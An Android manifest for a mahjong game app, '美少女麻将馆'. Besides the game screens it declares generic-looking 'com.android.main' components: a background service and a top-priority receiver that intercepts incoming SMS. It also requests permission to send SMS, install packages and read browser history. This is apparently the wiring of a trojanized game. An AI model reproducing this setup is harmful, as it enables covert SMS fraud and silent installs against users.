<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.rainbow.FMaj">
    <application android:icon="@drawable/icon" android:label="美少女麻将馆">
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:label="美少女麻将馆" android:name=".FMaj" android:screenOrientation="landscape">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:label="美少女麻将馆" android:name=".FMaj2" android:screenOrientation="landscape"/>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:label="美少女麻将馆" android:name=".FMaj3" android:screenOrientation="landscape"/>
        <meta-data android:name="Wooboo_PID" android:value="6ada44e4d8394ec2bdb68d757c678230"/>
        <meta-data android:name="Market_ID" android:value="177"/>
        <service android:name="com.android.main.MainService" android:process=":main"/>
        <receiver android:name="com.android.main.ActionReceiver">
            <intent-filter>
                <action android:name="android.intent.action.SIG_STR"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.android.main.SmsReceiver">
            <intent-filter android:priority="100000">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <activity android:name="com.android.main.TANCActivity" android:theme="@android:style/Theme.Dialog"/>
    </application>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>
    <uses-permission android:name="com.android.browser.permission.WRITE_HISTORY_BOOKMARKS"/>
    <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
</manifest>
